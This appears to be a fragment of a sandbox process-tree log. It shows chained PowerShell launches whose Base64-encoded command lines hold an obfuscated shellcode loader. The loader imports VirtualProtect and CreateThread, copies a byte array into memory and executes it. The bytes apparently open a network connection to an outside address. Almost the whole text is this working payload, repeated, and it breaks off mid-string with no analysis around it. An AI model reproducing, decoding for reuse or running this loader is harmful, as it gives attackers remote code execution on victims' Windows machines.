LAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADEALAB9AGEAMQAsAH0AYwAxACwAfQA2ADMALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADkAZAAsAH0AMwBhACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABjACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0ANgA4ACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBlAGUALAB9AGMAMwAiADsAJABiAFkAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFIATwAgAC0ATgBhAG0AZQAgACIAcABhACIAIAAtAG4AYQBtAGUAcwAgAHkAVgBCADsAJABiAFkAPQAkAGIAWQAuAHIAZQBwAGwAYQBjAGUAKAAiAHkAVgBCACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgAiACsAIgBzACIAKwAiACIAKQA7AF'+'sAYgB5AHQAZQBbAF0AXQAkAFIAVAAgAD0AIAAkAFIAVAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAbABZAFQAUwB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAGwAWQBUAFMAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAHIAYgA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAFIAVAAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHIAYgA9ACQAUgBUAC4ATAB9ADsAJAB0AHQAPQAkAGIAWQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAUABEAHcAIAA9ACAAMAA7AGYAbwByACgAJAB0AEkAPQAwADsAJAB0AEkAIAAtAGwAZQAoACQAUgBUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAHQASQArACsAKQB7ACQAYgBZADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdAB0AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAHQASQApACwAIAAkAFIAVABbACQAdABJAF0ALAAgADEAKQB9ADsAJABiAFkAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAdAB0ACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAUABEAHcAKQA7ACQAZQBzAHkAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAYgBZADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABlAHMAeQAsACQAdAB0ACwAMAAsADAALAAxAC0AMQApADsAJwA7ACQASgBQAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABRAEQAKQApADsAJABDAGUAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7ACQAWgBKAD0AIgBXAGkAbgBkAG8AdwBzACIAOwAkAGwAaQBkACAAPQAgACIAQwA6AFwAJABaAEoAXABrAHYAcwBCAEkAbABlAGoAXAAkAFoASgAkAEMAZQBcAHYAMQAuADAAXAAkAEMAZQAiADsAJABsAGkAZAAgAD0AIAAkAGwAaQBkAC4AcgBlAHAAbABhAGMAZQAoACIAawB2AHMAQgAiACwAIAAiAHMAeQBzACIAKQA7ACQAbABpAGQAIAA9ACAAJABsAGkAZAAuAHIAZQBwAGwAYQBjAGUAKAAiAEkAbABlAGoAIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJAB2AHYAVABPACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAdgBUAE8AJwApAHsAJABDAGUAPQAgACQAbABpAGQAfQA7ACQAWgB3AD0AIgAgACQAQwBlACAAeAB4AG0AIAAkAEoAUAAiADsAJABaAHcAPQAkAFoAdwAuAHIAZQBwAGwAYQBjAGUAKAAiAHgAeABtACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAWgB3AA'+'==')"4⤵PID:10144
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell /w 1 /C "sv xA -;sv Tnz ec;sv dg ((gv xA).value.toString()+(gv Tnz).value.toString());powershell (gv dg).value.toString() ('JABRAEQAPQAnACQAUgBPAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABQAEQAdwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUgBUAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQA0ADgALAB9ADEAOAAsAH0ANQAwACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADEALAB9AGEAMQAsAH0AYwAxACwAfQA2ADMALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADkAZAAsAH0AMwBhACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABjACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0ANgA4ACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBlAGUALAB9AGMAMwAiADsAJABiAFkAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAFIATwAgAC0ATgBhAG0AZQAgACIAcABhACIAIAAtAG4AYQBtAGUAcwAgAHkAVgBCADsAJABiAFkAPQAkAGIAWQAuAHIAZQBwAGwAYQBjAGUAKAAiAHkAVgBCACIALAAgACIAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgAiACsAIgBzACIAKwAiACIAKQA7AF'+'sAYgB5AHQAZQBbAF0AXQAkAFIAVAAgAD0AIAAkAFIAVAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAbABZAFQAUwB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAGwAWQBUAFMAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAHIAYgA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAFIAVAAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAHIAYgA9ACQAUgBUAC4ATAB9ADsAJAB0AHQAPQAkAGIAWQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAUABEAHcAIAA9ACAAMAA7AGYAbwByACgAJAB0AEkAPQAwADsAJAB0AEkAIAAtAGwAZQAoACQAUgBUAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAHQASQArACsAKQB7ACQAYgBZADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdAB0AC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAHQASQApACwAIAAkAFIAVABbACQAdABJAF0ALAAgADEAKQB9ADsAJABiAFkAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAdAB0ACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAUABEAHcAKQA7ACQAZQBzAHkAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAYgBZADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABlAHMAeQAsACQAdAB0ACwAMAAsADAALAAxAC0AMQApADsAJwA7ACQASgBQAD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABRAEQAKQApADsAJABDAGUAPQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7ACQAWgBKAD0AIgBXAGkAbgBkAG8AdwBzACIAOwAkAGwAaQBkACAAPQAgACIAQwA6AFwAJABaAEoAXABrAHYAcwBCAEkAbABlAGoAXAAkAFoASgAkAEMAZQBcAHYAMQAuADAAXAAkAEMAZQAiADsAJABsAGkAZAAgAD0AIAAkAGwAaQBkAC4AcgBlAHAAbABhAGMAZQAoACIAawB2AHMAQgAiACwAIAAiAHMAeQBzACIAKQA7ACQAbABpAGQAIAA9ACAAJABsAGkAZAAuAHIAZQBwAGwAYQBjAGUAKAAiAEkAbABlAGoAIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJAB2AHYAVABPACAAPQAgACcAVAAiACsAIgByACIAKwAiAHUAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAdgBUAE8AJwApAHsAJABDAGUAPQAgACQAbABpAGQAfQA7ACQAWgB3AD0AIgAgACQAQwBlACAAeAB4AG0AIAAkAEoAUAAiADsAJABaAHcAPQAkAFoAdwAuAHIAZQBwAGwAYQBjAGUAKAAiAHgAeABtACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAWgB3AA'+'==')"5⤵PID:8116
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABRAEQAPQAnACQAUgBPAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AIgArACIAZAAiACsAIgBsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuACIAKwAiAGQAIgArACIAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABQAEQAdwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAUgBUAD0AIgB9AGUAOAAsAH0AOABmACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADMAMQAsAH0AZAAyACwAfQA4ADkALAB9AGUANQAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0ANAA5ACwAfQA3ADUALAB9AGUAZgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANAAyACwAfQAzAGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADQAMAAsAH0ANwA4ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQA0AGMALAB9ADAAMQAsAH0AZAAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQA0ADgALAB9ADEAOAAsAH0ANQAwACwAfQA4ADUALAB9AGMAOQAsAH0ANwA0ACwAfQAzAGMALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQAzADEALAB9AGMAMAAsAH0AYQBjACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AMwA4ACwAfQBlADAALAB9ADcANQAsAH0AZgA0ACwAfQAwADMALAB9ADcAZAAsAH0AZgA4ACwAfQAzAGIALAB9ADcAZAAsAH0AMgA0ACwAfQA3ADUALAB9AGUAMAAsAH0ANQA4ACwAfQA4AGIALAB9ADUAOAAsAH0AMgA0ACwAfQAwADEALAB9AGQAMwAsAH0ANgA2ACwAfQA4AGIALAB9ADAAYwAsAH0ANABiACwAfQA4AGIALAB9ADUAOAAsAH0AMQBjACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQAwADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADAALAB9ADgAOQAsAH0ANAA0ACwAfQAyADQALAB9ADIANAAsAH0ANQBiACwAfQA1AGIALAB9ADYAMQAsAH0ANQA5ACwAfQA1AGEALAB9ADUAMQAsAH0AZgBmACwAfQBlADAALAB9ADUAOAAsAH0ANQBmACwAfQA1AGEALAB9ADgAYgAsAH0AMQAyACwAfQBlADkALAB9ADgAMAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0ANQBkACwAfQA2ADgALAB9ADMAMwAsAH0AMwAyACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA3ADcALAB9ADcAMwAsAH0AMwAyACwAfQA1AGYALAB9ADUANAAsAH0ANgA4ACwAfQA0AGMALAB9ADcANwAsAH0AMgA2ACwAfQAwADcALAB9ADgAOQAsAH0AZQA4ACwAfQBmAGYALAB9AGQAMAAsAH0AYgA4ACwAfQA5ADAALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9ADIAOQAsAH0AYwA0ACwAfQA1ADQALAB9ADUAMAAsAH0ANgA4ACwAfQAyADkALAB9ADgAMAAsAH0ANgBiACwAfQAwADAALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAYQAsAH0ANgA4ACwAfQBjADEALAB9AGEAMQAsAH0AYwAxACwAfQA2ADMALAB9ADYAOAAsAH0AMAAyACwAfQAwADAALAB9ADkAZAAsAH0AMwBhACwAfQA4ADkALAB9AGUANgAsAH0ANQAwACwAfQA1ADAALAB9ADUAMAAsAH0ANQAwACwAfQA0ADAALAB9ADUAMAAsAH0ANAAwACwAfQA1ADAALAB9ADYAOAAsAH0AZQBhACwAfQAwAGYALAB9AGQAZgAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0AOQA3ACwAfQA2AGEALAB9ADEAMAAsAH0ANQA2ACwAfQA1ADcALAB9ADYAOAAsAH0AOQA5ACwAfQBhADUALAB9ADcANAAsAH0ANgAxACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AMABjACwAfQBmAGYALAB9ADQAZQAsAH0AMAA4ACwAfQA3ADUALAB9AGUAYwAsAH0ANgA4ACwAfQBmADAALAB9AGIANQAsAH0AYQAyACwAfQA1ADYALAB9AGYAZgAsAH0AZAA1ACwAfQA2AGEALAB9ADAAMAAsAH0ANgBhACwAfQAwADQALAB9ADUANgAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADgAYgAsAH0AMwA2ACwAfQA2AGEALAB9ADQAMAAsAH0ANgA4ACwAfQAwADAALAB9ADEAMAAsAH0AMAAwACwAfQAwADAALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADYAOAAsAH0ANQA4ACwAfQBhADQALAB9ADUAMwAsAH0AZQA1ACwAfQBmAGYALAB9AGQANQAsAH0AOQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAwACwAfQA1ADYALAB9ADUAMwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMgAsAH0AZAA5ACwAfQBjADgALAB9ADUAZgAsAH0AZgBmACwAfQBkADUALAB9ADAAMQAsAH0AYwAzACwAfQAyADkALAB9AGMANgAsAH0ANwA1ACwAfQBlAGUALAB9AGMAMwAiADsAJABiAFkAPQBBAG